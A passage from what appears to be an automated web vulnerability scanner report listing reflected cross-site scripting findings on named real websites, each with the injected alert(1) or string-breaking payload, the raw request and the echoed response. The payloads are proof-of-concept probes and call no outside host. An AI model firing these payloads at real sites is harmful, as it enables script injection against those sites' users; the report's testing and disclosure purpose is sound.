Set-Cookie: jument_hash=b73f2f66647214b22889eaac093d9555c93cbeac; expires=Fri, 01-Apr-2016 18:41:08 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b73f2f66647214b22889eaac093d9555c93cbeac; expires=Fri, 01-Apr-2016 18:41:08 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
'314d4297df=1";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico?e1307'-alert(1)-'314d4297df=1';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2Zhdmljb24uaWNvP2UxMzA3Jy1hbGVydCgxKS0nMzE0ZDQyOTdkZj0x';
ch.home_url = 'http://www.collegehumor.com';
ch.user_id = 0
...[SNIP]...

6.31. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3b192--><a>42b747ad359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico3b192--><a>42b747ad359 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 14:25:35 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56159
Date: Sat, 02 Apr 2011 14:20:35 GMT
X-Varnish: 878005268
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy1v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<!-- BEGIN GN Ad Tag for Craveonline 1000x1000 favicon.ico3b192--><a>42b747ad359 -->
...[SNIP]...

6.32. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a67'-alert(1)-'dd8390ff089 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88a67'-alert(1)-'dd8390ff089 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 14:25:32 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app2v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56303
Date: Sat, 02 Apr 2011 14:20:32 GMT
X-Varnish: 878005112
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy1v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<scr'+'ipt language="JavaScript" src="http://n4403ad.doubleclick.net/adj/gn.cr.craveonline.com/favicon.ico88a67'-alert(1)-'dd8390ff089;sect=favicon.ico88a67'-alert(1)-'dd8390ff089;ct=favicon.ico88a67'-alert(1)-'dd8390ff089;ci=;sz=1000x1000;tile='+(gnm_tile++)+';ord=' + gnm_ord + '?">
...[SNIP]...

6.33. http://www.csmonitor.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6502"-alert(1)-"527e231a44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d6502"-alert(1)-"527e231a44 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csmonitor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 02 Apr 2011 13:27:22 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86384
Expires: Sun, 03 Apr 2011 13:27:07 GMT
Date: Sat, 02 Apr 2011 13:27:23 GMT
Content-Length: 21591
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/d6502"-alert(1)-"527e231a44";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

6.34. http://www.docstoc.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d5f5'-alert(1)-'7263aba8059 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9d5f5'-alert(1)-'7263aba8059 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docstoc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Set-Cookie: user_guid=1a45ceec-1c83-4750-a66d-bb53ea4fe27b; expires=Fri, 02-Apr-2021 13:31:59 GMT; path=/
Set-Cookie: first_time=1; domain=docstoc.com; path=/
Set-Cookie: session.docstoc.sourceinfo={"Source":"","Medium":"Direct","Term":"","Campaign":"","Content":""}; path=/
Set-Cookie: session.docstoc.seo={"Term":"","SEPage":"","SEType":""}; path=/
Set-Cookie: session.docstoc.source={"Refer":"","IP":"173.193.214.243","Country":"US","UA":"curl%2f7.21.0+(amd64-pc-win32)+libcurl%2f7.21.0+OpenSSL%2f0.9.8o+zlib%2f1.2.3"}; path=/
Set-Cookie: geoinfo.docstoc={"WorldRegionCode":1,"WorldRegionName":"United States","CountryCode":"US","CountryName":"United States","Region":"TX","City":"Dallas","Latitude":32.782501220703125,"Longitude":-96.8207015991211}; path=/
Set-Cookie: session.docstoc=d10a866a-2296-4f61-9582-da96250ad728; path=/
Set-Cookie: memguid.docstoc=811a77f3-6db6-4f0f-9360-a701e8733536; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: fingerprint.docstoc={"FingerprintId":"","DMA":"","City":"","Region":"","Country":"","Fonts":"","Plugins":"","UserAgent":"","IpAddress":"","Resolution":""}; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: pages_visited=1; path=/
Set-Cookie: general=showTopIE9=1,1,4/3/2011 6:31:59 AM; domain=docstoc.com; expires=Mon, 02-Apr-2012 13:31:59 GMT; path=/
Set-Cookie: cartItemCount=0; expires=Mon, 02-May-2011 13:31:59 GMT; path=/
serverID: www2
Date: Sat, 02 Apr 2011 13:31:58 GMT
Content-Length: 15433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:media="http://search.
...[SNIP]...
insertBefore(ga, s);
})();
var redirectUrl='/login/FacebookLogin.aspx?returnURL=http%3a%2f%2fwww.docstoc.com%2fPageNotFound%2fPageNotFound.aspx%3f404%3bhttp%3a%2f%2fwww.docstoc.com%3a80%2ffavicon.ico9d5f5'-alert(1)-'7263aba8059';
_qoptions={qacct:"p-07Zpl6-aPXQAI"};
</script>
...[SNIP]...

6.35. http://www.domaintools.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8b31<a>cfeca55b272 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c8b31<a>cfeca55b272 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.domaintools.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sat, 02 Apr 2011 14:45:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:45:19 GMT
Content-Length: 11939
Connection: close
Set-Cookie: dtsession=0c96c752b97d8eeab552cf2acdcba16d; expires=Tue, 30 Mar 2021 13:45:19 GMT; path=/; domain=.domaintools.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>cfeca55b272">Whois record for "c8b31<a>cfeca55b272"</a>
...[SNIP]...

6.36. http://www.driverside.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.driverside.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27027"-alert(1)-"893baf0fdc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico27027"-alert(1)-"893baf0fdc8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.driverside.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:11 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SelectedCarID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: SelectedTrimID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: SelectedStyleID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: TplType=2; expires=Mon, 09-May-2011 01:39:12 GMT; path=/
Set-Cookie: Ds_client=ed826f9ef3019c3a25abefb6fd651b0d; expires=Tue, 30-Mar-2021 13:39:12 GMT; path=/
Set-Cookie: UUID=DS-7fa5332a-91f8-76bb-ffa3-9ec63b1c8a2c; expires=Tue, 30-Mar-2021 13:39:12 GMT; path=/
Set-Cookie: business_id=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: partner_id=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
<!--

/* Copyright 1997-2004 Omniture, Inc. */
s.prop1="DS";
s.prop2="Sat";
s.prop3="06";
s.prop7="/favicon.ico27027"-alert(1)-"893baf0fdc8";
s.prop15="unregistered";
s.prop16="logged out";
s.prop17="non-member";
s.eVar1="DS";
s.eVar12="Sat";
s.eVar13="06";
s.eVar15="unregistered";
s.eVar16="logged out";
s.eVar17="non-member";
s.zip=""
/*
...[SNIP]...

6.37. http://www.education.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.education.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2a97"%3b06af93cafcd was submitted in the REST URL parameter 1. This input was echoed as d2a97";06af93cafcd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icod2a97"%3b06af93cafcd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.education.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 13:35:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: e=fhkbhen0kd9vs4jlqhf6ju3g10; expires=Sat, 02-Apr-2011 23:35:10 GMT; path=/; domain=www.education.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: i=0; expires=Tue, 14-Jun-2011 13:35:10 GMT; path=/
Content-Length: 140381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <meta http-equiv="co
...[SNIP]...
<!--if(!s.pageName) s.pageName="Education.com | An Education & Child Development Site for Parents | Parenting & Educational Resource";
s.pageType="errorPage";
if(!s.channel) s.channel="favicon.icod2a97";06af93cafcd";
s.prop5=Cookie.get('registered');
s.prop6=0;
s.prop7='organic';
s.eVar15='organic';
s.prop13='Home Page';
s.prop17='none';
s.campaign='';
s.prop18='web00';
if(Cookie.read&&Cookie.read('sevent', {pat
...[SNIP]...

6.38. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15911"><a>dcba971d871 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico15911"><a>dcba971d871 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input type="hidden" name="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZWWWHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO15911"><A>DCBA971D871EDTHR2WGPMZ0400HR2WGPMZ14400" id="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZWWWHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO15911">
...[SNIP]...

6.39. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4bbdc<script>alert(1)</script>7e8efe51f47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4bbdc<script>alert(1)</script>7e8efe51f47 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<p>The page you are looking for: "http://www.egotastic.com/favicon.ico4bbdc<script>alert(1)</script>7e8efe51f47" seems to be missing.</p>
...[SNIP]...

6.40. http://www.elyrics.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7526b<script>alert(1)</script>c49fd957cea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7526b<script>alert(1)</script>c49fd957cea HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyrics.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:36:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1173
Content-Type: text/html

<html>
<head><title>Page not Found on elyrics.net</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body><h1>Error 404 Page not Found</h1>
   <a href="/"><img src="http://a527.ac-images.
...[SNIP]...
<font color=red>/favicon.ico7526b<script>alert(1)</script>c49fd957cea</font>
...[SNIP]...

6.41. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 66975</title><script>alert(1)</script>b548febdb4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico66975</title><script>alert(1)</script>b548febdb4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1419
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico66975</title><script>alert(1)</script>b548febdb4d not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
...[SNIP]...

6.42. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4097f<script>alert(1)</script>ca01e159581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4097f<script>alert(1)</script>ca01e159581 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1403
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico4097f<script>alert(1)</script>ca01e159581 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
   fo
...[SNIP]...
<h1>/favicon.ico4097f<script>alert(1)</script>ca01e159581 not found on elyricsworld.com</h1>
...[SNIP]...

6.43. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 4ae7d</title><script>alert(1)</script>1082cba203e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4ae7d</title><script>alert(1)</script>1082cba203e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:04 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1425
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico?4ae7d</title><script>alert(1)</script>1082cba203e=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body

...[SNIP]...

6.44. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48892<script>alert(1)</script>4686b36e033 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?48892<script>alert(1)</script>4686b36e033=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:03 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1409
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico?48892<script>alert(1)</script>4686b36e033=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{

...[SNIP]...
<h1>/favicon.ico?48892<script>alert(1)</script>4686b36e033=1 not found on elyricsworld.com</h1>
...[SNIP]...

6.45. http://www.everydayhealth.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc61f'%3bd646a62950f was submitted in the REST URL parameter 1. This input was echoed as cc61f';d646a62950f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icocc61f'%3bd646a62950f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.everydayhealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 File Not Found
Date: Sat, 02 Apr 2011 13:27:14 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB07
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=Acwny4THb9g0MzViZGNkYi0xYTc0LTQxYTEtOGNlYy1jMjZhMDg0NDQ3NGM1; expires=Sat, 11-Jun-2011 00:07:14 GMT; path=/
Set-Cookie: ASP.NET_SessionId=kijeui555z3zjjmaqxna4s55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/favicon.icocc61f';d646a62950f', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

6.46. http://www.gamespot.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cd8"><script>alert(1)</script>0043b9c4893 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico95cd8"><script>alert(1)</script>0043b9c4893 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamespot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:07 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Mon, 02-May-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: ctk=NGQ5NzI0MmJhZGMxZDZmM2I2YzQ0ZDQ4NzY1ZQ%3D%3D; expires=Thu, 29-Sep-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_040211=1; expires=Tue, 05-Apr-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/favicon.ico95cd8"><script>alert(1)</script>0043b9c4893" />
...[SNIP]...

6.47. http://www.gamestop.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 599e8'a%3d'b'629f0608bc6 was submitted in the REST URL parameter 1. This input was echoed as 599e8'a='b'629f0608bc6 in the application's response.

